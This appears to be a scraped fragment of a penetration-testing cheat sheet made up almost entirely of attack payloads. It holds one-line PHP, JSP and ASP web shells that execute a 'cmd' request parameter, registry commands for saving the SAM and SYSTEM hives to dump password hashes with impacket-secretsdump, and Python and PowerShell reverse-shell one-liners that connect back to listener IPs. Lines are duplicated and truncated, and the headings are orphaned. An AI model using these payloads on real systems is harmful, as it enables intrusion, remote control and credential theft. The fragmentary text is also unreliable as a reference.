1 <?php system($_REQUEST["cmd"]); ?>
1
<?php system($_REQUEST["cmd"]); ?>
1 <% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
1 <% eval request("cmd") %>
<% eval request("cmd") %>
Traditional dumping In order to dump the same, two register keys must be retrieved: reg save hklm\sam c:\sam reg save hklm\system c:\system You need to use impacket-secretsdump to retrieve hash...
Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.175",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),...
Reverse Shell powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.16.2", 1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($...
Regex
Base64 Upload/Download